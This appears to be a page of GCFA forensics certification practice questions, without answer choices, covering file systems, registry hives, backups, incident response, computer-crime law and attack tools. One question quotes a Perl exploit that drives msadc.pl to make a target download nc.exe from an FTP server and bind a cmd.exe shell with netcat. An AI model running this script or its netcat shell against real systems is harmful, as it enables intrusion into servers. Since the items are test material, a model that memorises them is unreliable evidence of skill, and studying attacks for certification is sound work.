GCFA GIACCertified Forensics Analyst Question and Answers

Which of the following switches of the XCOPY command copies attributes while copying files?

Which of the following types of computers is used for attracting potential intruders?

John works as a professional Ethical Hacker. He has been assigned a project for testing the security of www.we-are-secure.com. He wants to corrupt an IDS signature database so that performing attacks on the server is made easy and he can observe the flaws in the We-are-secure server. To perform his task, he first of all sends a virus that continuously changes its signature to avoid detection from IDS. Since the new signature of the virus does not match the old signature, which is entered in the IDS signature database, IDS becomes unable to point out the malicious virus. Which of the following IDS evasion attacks is John performing?

Which of the following is the process of overwriting all addressable locations on a disk?

Nathan works as a professional Ethical Hacker. He wants to see all open TCP/IP and UDP ports of his computer. Nathan uses the netstat command for this purpose but he is still unable to map open ports to the running process with PID, process name, and path. Which of the following commands will Nathan use to accomplish the task?

You are handling technical support calls for an insurance company. A user calls you complaining that he cannot open a file, and that the file name appears in green while opening in Windows Explorer.

What does this mean?

Which of the following is a file management tool?

John works for an Internet Service Provider (ISP) in the United States. He discovered child

pornography material on a Web site hosted by the ISP. John immediately informed law enforcement authorities about this issue. Under which of the following Acts is John bound to take such an action?

John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare-secure.com. He is working on the Linux operating system. He wants to sniff the we-are-secure network and intercept a conversation between two employees of the company through session hijacking. Which of the following tools will John use to accomplish the task?

A firewall is a combination of hardware and software, used to provide security to a network. It is used to protect an internal network or intranet against unauthorized access from the Internet or other outside networks. It restricts inbound and outbound access and can analyze all traffic between an internal network and the Internet. Users can configure a firewall to pass or block packets from specific IP addresses and ports. Which of the following tools works as a firewall for the Linux 2.4 kernel?

You work as a Network Administrator for Perfect Solutions Inc. You install Windows 98 on a computer. By default, which of the following folders does Windows 98 setup use to keep the registry tools?

By gaining full control of router, hackers often acquire full control of the network. Which of the following methods are commonly used to attack Routers?

Each correct answer represents a complete solution. Choose all that apply.

Which of the following parameters is NOT used for calculating the capacity of the hard disk?

Which of the following is described in the following statement?

"It is a 512 bytes long boot sector that is the first sector of a default boot drive. It is also known as Volume Boot Sector, if the boot drive is un-partitioned. "

Which of the following file systems is used by both CD and DVD?

Which of the following registry hives stores configuration information specific to a particular user who is currently logged on to the computer?

Which of the following provides high availability of data?

Which of the following is a password-cracking program?

Which of the following tools is used to block email, Instant Message, Web site, or other media if inappropriate words such as pornography, violence etc. is used?

In which of the following files does the Linux operating system store passwords?

Which of the following representatives of incident response team takes forensic backups of the systems that are the focus of the incident?

Which of the following commands is used to create or delete partitions on Windows XP?

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He has successfully completed the following pre-attack phases while testing the security of the server:

Footprinting

Scanning

Now he wants to conduct the enumeration phase. Which of the following tools can John use to conduct it?

Each correct answer represents a complete solution. Choose all that apply.

Sandra wants to create a full system state backup of her computer, which is running on Microsoft Windows XP operating system. Which of the following is saved in full state system backup?

Each correct answer represents a complete solution. Choose all that apply.

Mark has been hired by a company to work as a Network Assistant. He is assigned the task to

configure a dial-up connection. He is configuring a laptop. Which of the following protocols should he disable to ensure that the password is encrypted during remote access?

You are responsible for tech support at your company. You have been instructed to make certain that all desktops support file and folder encryption. Which file system should you use when installing Windows XP?

Which of the following describes software technologies that improve portability, manageability, and compatibility of applications by encapsulating them from the underlying operating system on which they are executed?

What is the name of the group of blocks which contains information used by the operating system in Linux system?

Adam works as a Security Analyst for Umbrella Inc. He suspects that a virus exists in the network of the company. He scanned the client system with latest signature-based anti-virus, but no productive results have been obtained. Adam suspects that a polymorphic virus exists in the network. Which of the following statements are true about the polymorphic virus?

Each correct answer represents a complete solution. Choose all that apply.

Mark is taking a data backup during non-working hours from a remote computer on the network by using the Backup utility. What will he do to ensure that the backup has no errors?

An organization wants to mitigate the risks associated with the lost or stolen laptops and the associated disclosure laws, while reporting data breaches. Which of the following solutions will be best for the organization?

John works as a Technical Support Executive in ABC Inc. The company's network consists of ten computers with Windows XP professional installed on all of them. John is working with a computer on which he has enabled hibernation. He shuts down his computer using hibernation mode. Which of the following will happen to the data after powering off the system using hibernation?

Which of the following is a nonvolatile form of memory that can be reprogrammed by using a special programming device, and need not to be removed from the PC to be reprogrammed?

Which of the following commands is used to enforce checking of a file system even if the file system seems to be clean?

Which of the following files in LILO booting process of Linux operating system stores the location of Kernel on the hard drive?

You are the Security Consultant and have been hired to check security for a client's network. Your client has stated that he has many concerns but the most critical is the security of Web applications on their Web server. What should be your highest priority then in checking his network?

You use the FAT16 file system on your Windows 98 computer. You want to upgrade to the FAT32 file system. What is the advantage of the FAT32 file system over FAT16 file system?

Each correct answer represents a complete solution. Choose two.

Which of the following sections of United States Economic Espionage Act of 1996 criminalizes the misappropriation of trade secrets related to or included in a product that is produced for or placed in interstate commerce, with the knowledge or intent that the misappropriation will injure the owner of the trade secret?

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl

msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");

system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo

bin>>sasfile\""); system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C

\"echo get hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print

"Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when

download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Which of the following involves changing data prior to or during input to a computer in an effort to commit fraud?

You work as a Network Administrator for NetTech Inc. To ensure the security of files, you encrypt data files using Encrypting File System (EFS). You want to make a backup copy of the files and maintain security settings. You can backup the files either to a network share or a floppy disk. What will you do to accomplish this?

Jason, a game lover, owns an Apple's iPod nano. He wants to play games on his iPod. He also wants to improve the quality of the audio recording of his iPod. Which of the following steps can Jason take to accomplish the task?

Which of the following classes of hackers describes an individual who uses his computer knowledge for breaking security laws, invading privacy, and making information systems insecure?

Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate computer of an unfaithful employee of SecureEnet Inc. Suspect's computer runs on Windows operating system. Which of the following sources will Adam investigate on a Windows host to collect the electronic evidences?

Each correct answer represents a complete solution. Choose all that apply.